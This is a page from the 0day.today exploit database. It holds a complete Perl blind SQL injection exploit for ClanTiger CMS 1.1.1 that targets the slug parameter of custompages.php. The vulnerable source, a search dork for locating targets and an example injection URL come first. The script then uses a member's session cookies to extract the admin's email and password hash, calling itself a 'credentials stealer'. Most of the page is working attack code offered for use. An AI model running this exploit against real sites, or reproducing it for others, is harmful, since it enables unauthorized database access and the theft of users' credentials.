0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ClanTiger <= 1.1.1 (slug) Blind SQL Injection Exploit
===================================================== ClanTiger <= 1.1.1 (slug) Blind SQL Injection Exploit ===================================================== #---------------------------------------------------------------------------------------------- #| (custompage.php) BLIND SQL INJECTION | #|--------------------------------------------------------------------------------------------| #| | CLAN TIGER CMS | | #| CMS INFORMATION: ---------------- | #| | #|-->WEB: http://www.clantiger.com | #|-->DOWNLOAD: http://www.clantiger.com/download-clan-cms | #|-->DEMO: http://www.demo.clantiger.com/ | #|-->CATEGORY: CMS / Portals | #|-->DESCRIPTION: ClanTiger is a content management system specifically designed for gaiming | #| clans... | #| | #| CMS VULNERABILITY: | #| | #|-->TESTED ON: firefox 2.0.0.20 and IE 7.0.5730 (Default) | #|-->DORK: "Powered by ClanTiger" | #|-->CATEGORY: BLIND SQL INJECTION/ PERL EXPLOIT | #|-->AFFECT VERSION: LAST = 1.1.1 (1.1 too) | #|-->Discovered Bug date: 2009-04-12 | #|-->Reported Bug date: 2009-04-12 | #|-->Fixed bug date: Not fixed | #|-->Info patch (????): Not fixed | #|-->Author: YEnH4ckEr | #|-->WEB/BLOG: N/A | #|-->COMMENT: A mi novia Marijose...hermano,cunada, padres (y amigos xD) por su apoyo. | #---------------------------------------------------------------------------------------------- # #----------- #BUG FILE: #----------- # #Path --> [HOME_PATH]/modules/custompages.php # #It contents: # # function main() # { # # ... # # $page = new CustomPage(); # $page->slug = $_GET['slug']; # $page->getBy(array('slug')); # # if(!$page->id) # { # throw new cccException('The page you are looking for is currently unavailable. You may need to STOP! Hammertime. If School Is Out, You should try reloading this page.','Page not found'); # } # # $tpl->define('title',$page->title); # $tpl->define('content',$page->content); // we allow HTML here, no safeoutput # # $this->pageDetails->setTitle($page->title); # $this->pageDetails->addKeyword($page->keywords); # $this->pageDetails->setDescription($page->description); # # $this->content = $tpl->publish(); # $this->display(); # } # #------------ #CONDITIONS: #------------ # #**DB_PREFIX="" (Default) # # maybe: db, db_clan, ... # #**Exist a custompage # #**gpc_magic_quotes=off # #--------------------------------------- #PROOF OF CONCEPT (BLIND SQL INJECTION): #--------------------------------------- # #[HOME_PATH]/modules/custompages.php?slug=the_custom_page' [BLIND SQL INJECTION] # #--------- #EXAMPLE: #--------- # #[HOME_PATH]/modules/custompages.php?slug=the_custom_page'%20AND%20((SELECT%20length(username)%20from%20members%20WHERE%20id=1)=5)%20/* # #Result: admin's username has 5 characters (maybe = admin? :P) # #******************************************************************* # ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! #******************************************************************* #------------------------------------------------------------------- #******************************************************************* # GREETZ TO: JosS and all spanish Hack3Rs community! #******************************************************************* # #-------------------EOF---------------------------------->>>ENJOY IT! # use LWP::UserAgent; use HTML::TreeBuilder 2.96; #Subroutines sub lw { my $SO = $^O; my $linux = ""; if (index(lc($SO),"win")!=-1){ $linux="0"; }else{ $linux="1"; } if($linux){ system("clear"); } else{ system("cls"); system ("title Clan Tiger CMS (module custompages.php) BLIND SQL Injection Exploit"); system ("color 02"); } } sub request { my $cookie="CCC_LANG=en;"." CCC_UID=".$_[0]."; CCC_CODE=".$_[1].";"; my $userag = LWP::UserAgent->new; $userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); my $request = HTTP::Request -> new(GET => $_[2]); $request->header(cookie => $cookie); my $outcode= $userag->request($request)->as_string; return $outcode; } sub helper { print "\n\t[**] Clan Tiger CMS - BLIND SQL Injection Exploit\n"; print "\t[??] USAGE MODE: [??]\n"; print "\t[**] perl $0 [HOST] [PATH] [uid] [code] [slug] [id] [DB_PREFIX]\n"; print "\t[**] [HOST]: Web attacked.\n"; print "\t[**] [PATH]: Home Path.\n"; print "\t[**] [uid]: The CCC_UID cookie.\n"; print "\t[**] [code]: The CCC_CODE cookie.\n"; print "\t[**] [slug]: Title custompage.\n"; print "\t[**] [id]: Exploiting id user. Default: 1 (**optional)\n"; print "\t[**] [DB_PREFIX]: Global var needed. Default: null (**optional)\n"; print "\t[**] Example: perl $0 www.example.es Clan-tiger-111 f717716... \n"; print "\t[**] ...2e1a50db06c0f2fe8804885ac2c01390 namecustompage 1 \"\"\n"; } sub mail{ $output=&request($_[0],$_[1],$_[2]); my $root = HTML::TreeBuilder->new_from_content($output); # source file $email= $root->look_down('_tag','td','style','width: 70%'); print "\t-----------------------------------------------------------------\n"; print "\tMail captured!.Getting password hash. Wait for a moment...\n"; print "\t-----------------------------------------------------------------\n"; return $email -> as_text(); $root->delete(); } sub password { #Second password... $j=1; $i=48; while(($j<=32) && ($i<=126)){ my $finalrequest=$_[4]."'+AND+ascii(substring((SELECT+password+FROM+".$_[0]."members+WHERE+id=".$_[1]."),".$j.",1))=".$i."+/*"; $output=&request($_[2],$_[3],$finalrequest); if ( $output =~ (/<title>/.$custompage)) { $pass=$pass.chr($i); $j++; $i=47; } if($i==57) { $i=96; } #new char $i++; } #Error if(($i>127) || ($j>32)){ if(!$pass){ print "\t-----------------------------------------------------------------\n"; print("\tEXPLOIT FAILED!\n"); print("\tFatal error: Datas doesn't find!\n"); print "\t-----------------------------------------------------------------\n"; exit(1); } } return $pass; } #Main &lw; print "\t\t#########################################################\n\n"; print "\t\t#########################################################\n\n"; print "\t\t## Clan Tiger CMS - BLIND SQL Injection Exploit ##\n\n"; print "\t\t## ++Conditions: Need a register user,a custompage ##\n\n"; print "\t\t## and DB_PREFIX (default:null) ##\n\n"; print "\t\t## Author: Y3nh4ck3r ##\n\n"; print "\t\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n"; print "\t\t## Proud to be Spanish! ##\n\n"; print "\t\t#########################################################\n\n"; print "\t\t#########################################################\n\n"; #Init variables my $host=$ARGV[0]; my $path=$ARGV[1]; my $uid=$ARGV[2]; my $code=$ARGV[3]; my $custompage=$ARGV[4]; #Build the uri my $finalhost="http://".$host."/".$path."/index.php?module=custompages&slug="; $finalhost=$finalhost.$custompage; #Check all variables needed $numArgs = $#ARGV + 1; if($numArgs<=4) { &helper; exit(1); } #Id-user is optional.Default:1 if(!$ARGV[5]){ $idhack="1"; }else{ $idhack=$ARGV[5]; } if(!$ARGV[6]){ $db_prefix=""; }else{ $db_prefix=$ARGV[6]; } #Testing my $finalrequest = $finalhost; $output=&request($uid,$code,$finalrequest); if ( $output =~ /<div class="title">Access denied<\/div>/) { print "\t-----------------------------------------------------------------\n"; print "\tYour credentials are not correct! This exploits need login.\n"; print "\tOptions: [your-id-user],[your-password] incorrect.\n"; print "\tExploit failed! No luck!\n"; print "\t-----------------------------------------------------------------\n"; exit(1); } if ( $output =~ /<div class="title">Page not found<\/div>/) { print "\t-----------------------------------------------------------------\n"; print "\tCustom page doesn't exist! Maybe no there on this server!\n"; print "\tOption: [slug-get-var] incorrect.\n"; print "\tExploit failed! No luck!\n"; print "\t-----------------------------------------------------------------\n"; exit(1); } if ( $output =~ (/<title>/.$custompage)) { print "\t-----------------------------------------------------------------\n"; print "\tThis Web could be vulnerable!\n"; print "\tThe custompage exists!\n"; print "\tTesting Blind SQL Injection...\n"; print "\t-----------------------------------------------------------------\n"; }else{ print "\t-----------------------------------------------------------------\n"; print "\tCustompage doesn't exist!\n"; print "\tEXPLOIT FAILED!\n"; print "\t-----------------------------------------------------------------\n"; exit(1); } #Test blind sql injection my $finalrequest=$finalhost."'+AND+1=1+/*"; $output=&request($uid,$code,$finalrequest); if ( $output =~ (/<title>/.$custompage)) { print "\t-----------------------------------------------------------------\n"; print "\tThis Web is really vulnerable!\n"; print "\tTested Blind SQL Injection.\n"; print "\tChecking id user and DB_PREFIX null...\n"; print "\t-----------------------------------------------------------------\n"; }else{ print "\t-----------------------------------------------------------------\n"; print "\tThis Web is not vulnerable (Maybe patched)!\n"; print "\tEXPLOIT FAILED!\n"; print "\t-----------------------------------------------------------------\n"; exit(1); } #Test if user exists and DB_PREFIX my $finalrequest=$finalhost."'+AND+(SELECT+COUNT(*)+from+".$db_prefix."members+WHERE+id=".$idhack.")+/*"; $output=&request($uid,$code,$finalrequest); if ( $output =~ (/<title>/.$custompage)) { print "\t-----------------------------------------------------------------\n"; print "\tOK...The user exists and DB_PREFIX is '".$db_prefix."'!\n"; print "\tStarting exploit...\n"; print "\t-----------------------------------------------------------------\n"; print "\tWait several minutes...\n"; print "\t-----------------------------------------------------------------\n"; }else{ print "\t-----------------------------------------------------------------\n"; print "\tUser doesn't exists or DB_PREFIX not '".$db_prefix."'\n"; print "\tEXPLOIT FAILED!\n"; print "\t-----------------------------------------------------------------\n"; exit(1); } #OK, now we get the mail user from web #i got it from blind sql but this method is faster and reduce time of injection #First email... my $hostmail="http://".$host."/".$path."/index.php?module=profiles&action=view&id=".$idhack; $mail=&mail($uid,$code,$hostmail); $passhash=&password($db_prefix,$idhack,$uid,$code,$finalhost); print "\n\t\t*************************************************\n"; print "\t\t**** EXPLOIT EXECUTED (CREDENTIALS STEALER) ****\n"; print "\t\t*************************************************\n\n"; print "\t\tUser-id:".$idhack."\n"; print "\t\tUser-email:".$mail."\n"; print "\t\tUser-password(hash):".$passhash."\n\n"; print "\n\t\t----------------------FINISH!--------------------\n\n"; exit(1); #Ok...all job done # 0day.today [2024-11-16] #